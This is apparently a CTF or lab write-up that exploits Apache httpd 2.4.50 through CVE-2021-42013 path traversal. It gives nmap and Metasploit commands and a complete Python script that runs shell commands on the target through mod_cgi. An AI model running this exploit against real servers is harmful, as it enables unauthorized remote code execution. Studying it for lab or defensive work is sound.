nmap -sS -sV <ipaddress>
Then we see the output:
Nmap output
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.50 ((Unix))
As we can see, the server speaks HTTP on port 80 and the version is Apache httpd 2.4.50 (Unix), so my next step is to research the known vulnerabilities, exploits and CVEs for this version. Apache 2.4.49 and 2.4.50 are affected by the path normalization flaw CVE-2021-42013 (the incomplete fix for CVE-2021-41773), which gives path traversal and, when mod_cgi is enabled, remote code execution. So I opened Metasploit on my terminal:
msfconsole
Then we look for it with the search command (search CVE-2021-42013) and find the module for CVE-2021-42013. After finding it we load it with the use command:
use multi/http/apache_normalize_path_rce
Then we could list the options the exploit requires with the options command, but as RTFM people we always run the info command first, and only then set LHOST, RHOSTS and RPORT in msfconsole:
set RHOSTS <victim ip>
set RPORT 80 **(for http)**
set LHOST <attacker ip>
Since the connection is plain HTTP, not TLS/SSL, we also turn SSL off:
set SSL false
If you try to run the exploit at this point it won't work, because this box does not give us a remote session, so we change the target from Automatic to the Unix command target (show targets lists the IDs):
set target <targetid>
For this module, ID 1 is the Unix command target:
set target 1
After setting the target we open the options again and see CMD listed as a required option (it belongs to the cmd/unix/generic payload, which runs a single command on the target instead of opening a session). For this lab we only need to read the secret.txt file:
set CMD cat /secret.txt
We're all set; the only thing left is to run the exploit with run (or exploit), and the output of the command is printed once the payload has executed.
You may encounter this error: Exploit failed: cmd/unix/generic cannot cleanup files created during exploit. To run anyway, set AllowNoCleanup to true
In this case just set it and run again (keep in mind that any files the exploit drops on the target then stay there, so note them for cleanup later):
set AllowNoCleanup true
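To understand what the Metasploit module is doing under the hood, here is an added example (not code from the write-up or from the Metasploit project) that builds the same kind of request by hand: a traversal out of cgi-bin that lands on /bin/sh, with the command delivered in the POST body. The host, port, target file and the cgi-bin depth of four directories (the layout of a source-built httpd such as /usr/local/apache2/cgi-bin) are assumptions for this lab; like the module, it also assumes mod_cgi is enabled and the filesystem root is covered by Require all granted. The decode helper is a simplified model of why the double-encoded form gets past 2.4.50, not httpd's own code.

```python
"""Manual check for CVE-2021-42013 (Apache httpd 2.4.49/2.4.50 path normalization).

Added example. Assumes: mod_cgi enabled, cgi-bin four directories deep
(e.g. /usr/local/apache2/cgi-bin) and 'Require all granted' on '/'.
Host, port and target file are lab placeholders, not values from the write-up.
"""
import http.client
from urllib.parse import unquote

# ".%2e" is the CVE-2021-41773 form (blocked by 2.4.50); ".%%32%65" is the
# double-encoded form that still slips past 2.4.50's check (CVE-2021-42013).
SEGMENT_41773 = ".%2e"
SEGMENT_42013 = ".%%32%65"


def decode_like_httpd(segment: str, rounds: int) -> str:
    """Simplified model: percent-decode `rounds` times to see what the server
    ends up comparing against '..'. Python's unquote leaves the invalid '%%3'
    alone on the first pass, which is what makes the second pass dangerous."""
    for _ in range(rounds):
        segment = unquote(segment)
    return segment


def build_cgi_path(depth: int = 4, binary: str = "/bin/sh",
                   segment: str = SEGMENT_42013) -> str:
    """Traversal path that resolves to `binary` on disk once httpd decodes it.

    Extra levels beyond the real directory depth are harmless: '..' at '/'
    stays at '/', which is why the Metasploit module can use a generous DEPTH.
    """
    return "/cgi-bin/" + "/".join([segment] * depth) + binary


def build_cgi_body(cmd: str) -> str:
    """Body that mod_cgi feeds to /bin/sh on stdin. The echo statements make
    httpd accept the output as a valid CGI response (header, blank line, body)."""
    return f"echo Content-Type: text/plain; echo; {cmd}"


def run_command(host: str, port: int, cmd: str, timeout: float = 10.0) -> str:
    """Live step: POST the command through the traversal and return what the
    shell printed. Raises if the server does not answer 200 (not vulnerable,
    mod_cgi disabled, or the directory depth assumption is wrong)."""
    body = build_cgi_body(cmd)
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", build_cgi_path(), body=body,
                     headers={"Content-Type": "text/plain",
                              "Content-Length": str(len(body))})
        resp = conn.getresponse()
        data = resp.read().decode(errors="replace")
        if resp.status != 200:
            raise RuntimeError(f"HTTP {resp.status}: target not exploitable as assumed")
        return data
    finally:
        conn.close()


if __name__ == "__main__":
    # Same effect as 'set CMD cat /secret.txt' in msfconsole; 10.10.10.10 is a placeholder.
    print(run_command("10.10.10.10", 80, "cat /secret.txt"))
```

If the request comes back 403 instead of 200, the server is usually not granting access to the filesystem root (no Require all granted), in which case neither this script nor the module's RCE target will work even though the version is affected.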
Thanks for reading my first write-up.